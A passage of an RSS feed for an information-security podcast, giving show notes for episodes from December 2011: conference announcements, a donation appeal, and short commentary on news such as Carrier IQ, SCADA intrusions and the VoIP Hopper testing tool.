<p><span>Source: </span><a href="https://www.infoworld.com/d/the-industry-standard/surprise-certified-it-jobs-are-paying-less-180469"><span>https://www.infoworld.com/d/the-industry-standard/surprise-certified-it-jobs-are-paying-less-180469</span></a></p>
<p><span>This article asserts that it&rsquo;s a bad idea to jump into IT with nothing more than your cert. &nbsp;Probably true. &nbsp;Do you guys think any of this carries over to security?</span></p>
<p><span>Source:</span><span> </span><a href="http://mashable.com/2011/12/03/carrier-iq-is-misunderstood-not-evil/"><span>http://mashable.com/2011/12/03/carrier-iq-is-misunderstood-not-evil/</span></a></p>
<p><span>Here is a fairly narrow-minded write up on carrier IQ from mashable. &nbsp;This line says it all:</span></p>
<p><span>&ldquo;&#8230;it would be nearly impossible for anyone without a programming degree to decipher it. The hieroglyphics spit out by Carrier IQ actually reminded me of code I had seen before. Not on an Android device or even another mobile phone, but on a PC and from a pretty long time ago.&rdquo;</span></p>
<p><span>So in other words, since the author of that article can&rsquo;t figure it out, no one can. &nbsp;And no tools could POSSIBLY be written to parse the CIQ output.</span></p>
<p><span>Lot&rsquo;s of nonsense to talk about in this blog post&#8230;</span><br />
		<span>Source:</span><span> </span><a href="http://www.information-age.com/channels/security-and-continuity/news/1676243/hackers-accessed-city-infrastructure-via-scada-fbi.thtml"><span>http://www.information-age.com/channels/security-and-continuity/news/1676243/hackers-accessed-city-infrastructure-via-scada-fbi.thtml</span></a></p>
<p><span>This statement makes me reach for my tinfoil hat for some reason:</span></p>
<p><span>&ldquo;Cyber security is &quot;a huge growth factor&quot; for the FBI, says Welch. He expects the bureau&#039;s Cyber Division to double in size during the next 12 to 18 months.&ldquo;</span></p>
<p><span>Source:</span><span> </span><a href="http://thehackernews.com/2011/11/security-research-be-friend-to-anyone.html"><span>http://thehackernews.com/2011/11/security-research-be-friend-to-anyone.html</span></a></p>
<p><span>I&rsquo;ll be your best friend&#8230;</span></p>
<p><span>Clever technique for becoming virtually anyone&rsquo;s friend on facebook with a little work by exploiting the web of trust&#8230;</span></p>
<p><span>Source:</span><span> </span><a href="https://www.net-security.org/secworld.php?id=12008"><span>https://www.net-security.org/secworld.php?id=12008</span></a></p>
<p><span>Lesson, if you want to blog anonymously, don&rsquo;t use the same Google Analytics account for all your sites.</span></p>
<p><span>Source:</span><span> </span><a href="http://arstechnica.com/business/news/2011/11/europes-largest-it-firm-to-scrap-internal-e-mail.ars"><span>http://arstechnica.com/business/news/2011/11/europes-largest-it-firm-to-scrap-internal-e-mail.ars</span></a></p>
<p><span>Unique solution to the corporate spam problem.</span></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-537-weekly-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3230/0/infosec-daily-podcast-episode-537.mp3" length="23580707" type="audio/mpeg" />
		<itunes:duration>0:49:08</itunes:duration>
		<itunes:subtitle>&#160;
Episode 537 &#8211; Weekly wrap up with Dr. b0n3z
	InfoSec Daily Podcast Episode 537 for December 3, 2011. &#160;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
&#160;
Guests: gradius, warrax, brew_ninja, fr0[...]</itunes:subtitle>
		<itunes:summary>&#160;
Episode 537 &#8211; Weekly wrap up with Dr. b0n3z
	InfoSec Daily Podcast Episode 537 for December 3, 2011. &#160;Tonight&#039;s podcast is hosted by Dr. b0n3z, Boris Sverdlik, and Geordy Rostad.
&#160;
Guests: gradius, warrax, brew_ninja, fr0ntpag3, and yngjungian.
Announcements:
		Brad Smith (theNurse) 
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
		When: Starts January 24, 2012
		Where: Atlanta, GA
		Discount Code: 
		http://www.sans.org/mentor/details.php?nid=25484
ShmooCon 2012
		When: January 27th-29th, 2012
		Where: Washington Hilton Hotel, Washington, DC
		http://www.shmoocon.org
		Second round of tickets sold out!
Thotcon 0&#215;3
		When: Friday April 27th, 2012
		Where: Secret location in Chicago
		http://tickets.thotcon.org/
		Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012 
		When: May 21-25, 2012 
		Where: MU Forensic Science Center
		http://aide.marshall.edu
		CFP now open!
DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
		When: &#160;September 27-30, 2012
		Where: Louisville, KY
		http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
Stories:
Source: https://www.infoworld.com/d/the-industry-standard/surprise-certified-it-jobs-are-paying-less-180469
This article asserts that it&#8217;s a bad idea to jump into IT with nothing more than your cert. &#160;Probably true. &#160;Do you guys think any of this carries over to security?
Source: http://mashable.com/2011/12/03/carrier-iq-is-misunderstood-not-evil/
Here is a fairly narrow-minded write up on carrier IQ from mashable. &#160;This line says it all:
&#8220;&#8230;it would be nearly impossible for anyone without a programming degree to decipher it. The hieroglyphics spit out by Carrier IQ actually reminded me of code I had seen before. Not on an Android device or even another mobile phone, but on a PC and from a pretty long time ago.&#8221;
So in other words, since the author of that article can&#8217;t figure it out, no one can. &#160;And no tools could POSSIBLY be written to parse the CIQ output.
Lot&#8217;s of nonsense to talk about in this blog post&#8230;
		Source: http://www.information-age.com/channels/security-and-continuity/news/1676243/hackers-accessed-city-infrastructure-via-scada-fbi.thtml
This statement makes me reach for my tinfoil hat for some reason:
&#8220;Cyber security is &#34;a huge growth factor&#34; for the FBI, says Welch. He expects the bureau&#039;s Cyber Division to double in size during the next 12 to 18 months.&#8220;
Source: http://thehackernews.com/2011/11/security-research-be-friend-to-anyone.html
I&#8217;ll be your best friend&#8230;
Clever technique for becoming virtually anyone&#8217;s friend on facebook with a little work by exploiting the web of trust&#8230;
Source: https://www.net-security.org/secworld.php?id=12008
Lesson, if you want to blog anonymously, don&#8217;t use the same Google Analytics account[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 536 &#8211; CIQ Detector, VoIP Hopper, PlayBook, Safe Browsing, Yahoo 0-day, Legal Piracy, The Mole &amp; Certified Paycut</title>
		<link>http://www.isdpodcast.com/episode-536-ciq-detector-voip-hopper-playbook-safe-browsing-yahoo-0-day-legal-piracy-the-mole-certified-paycut</link>
		<comments>http://www.isdpodcast.com/episode-536-ciq-detector-voip-hopper-playbook-safe-browsing-yahoo-0-day-legal-piracy-the-mole-certified-paycut#comments</comments>
		<pubDate>Sat, 03 Dec 2011 02:09:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3224</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 536 for December 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 536 for December 2, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse) </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Second round of tickets sold out!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thotcon 0&#215;3</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Friday April 27th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Secret location in Chicago</span><br />
	<a href="http://tickets.thotcon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://tickets.thotcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012 </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://thehackernews.com/2011/12/voodoo-carrier-iq-detector-application.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">thehackernews.com/2011/12/voodoo-carrier-iq-detector-application.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An Android developer recently</span><a href="http://thehackernews.com/2011/11/your-android-phone-is-spying-on-you-use.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">discovered</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a clandestine application called Carrier IQ built into most smartphones that doesn&#39;t just track your location; it secretly records your keystrokes, and there&#39;s nothing you can do about it. A new Android app to identify whether your smartphone has any Carrier IQ tracking/monitoring software installed on it has been released, the </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Voodoo Carrier IQ detector</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, giving users a simple way to put their minds to rest on privacy. The handiwork of Android app developer supercurio, the tool is only a few hours old and only partially finished, with the consequent warning that the results can&rsquo;t be entirely relied on yet.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tool: </span><a href="http://voiphopper.sourceforge.net/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://voiphopper.sourceforge.net/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">VoIP Hopper is a VLAN Hop test tool but also a tool to test VoIP infrastructure security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Features</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New &ldquo;Assessment&rdquo; mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown networkinfrastructure</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New VLAN Discovery methods (802.1q ARP, LLDP-MED)</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LLDP-MED spoofing and sniffing support</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Can bypass VoIP VLAN subnets that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP</span></li>
</ul>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Support for injections using Mysql, SQL Server, Postgres and Oracle databases.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Command line interface. Different commands trigger different actions.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Auto-completion for commands, command arguments and database, table and columns names.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Developed in python 3.</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-536-ciq-detector-voip-hopper-playbook-safe-browsing-yahoo-0-day-legal-piracy-the-mole-certified-paycut/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3224/0/infosec-daily-podcast-episode-536.mp3" length="24146274" type="audio/mpeg" />
		<itunes:duration>0:50:15</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 536 for December 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) 
	We all know and lov[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 536 for December 2, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, Dr. Bonez, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse) 
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Second round of tickets sold out!
	Thotcon 0&#215;3
	When: Friday April 27th, 2012
	Where: Secret location in Chicago
	http://tickets.thotcon.org/
	Attending THOTCON counts towards CAP, SSCP or CISSP CPE credits.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012 
	When: May 21-25, 2012 
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: thehackernews.com/2011/12/voodoo-carrier-iq-detector-application.html
	An Android developer recently discovered a clandestine application called Carrier IQ built into most smartphones that doesn&#39;t just track your location; it secretly records your keystrokes, and there&#39;s nothing you can do about it. A new Android app to identify whether your smartphone has any Carrier IQ tracking/monitoring software installed on it has been released, the Voodoo Carrier IQ detector, giving users a simple way to put their minds to rest on privacy. The handiwork of Android app developer supercurio, the tool is only a few hours old and only partially finished, with the consequent warning that the results can&#8217;t be entirely relied on yet.

	Tool: http://voiphopper.sourceforge.net/
	VoIP Hopper is a VLAN Hop test tool but also a tool to test VoIP infrastructure security.
	New Features

New &#8220;Assessment&#8221; mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown networkinfrastructure
New VLAN Discovery methods (802.1q ARP, LLDP-MED)
LLDP-MED spoofing and sniffing support
Can bypass VoIP VLAN subnets that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP


Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
Command line interface. Different commands trigger different actions.
Auto-completion for commands, command arguments and database, table and columns names.
Support for query filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
Developed in python 3.
</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 535 &#8211; cIQiOS, Mall Tracking Abandoned, Chrome Takeover, Water Pump Follow Up, Tea &amp; TeaMP0isoN</title>
		<link>http://www.isdpodcast.com/episode-535-ciqios-mall-tracking-abandoned-chrome-takeover-water-pump-follow-up-tea-teamp0ison</link>
		<comments>http://www.isdpodcast.com/episode-535-ciqios-mall-tracking-abandoned-chrome-takeover-water-pump-follow-up-tea-teamp0ison#comments</comments>
		<pubDate>Fri, 02 Dec 2011 01:47:29 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3220</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 535 for December 1, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and [...]]]></description>
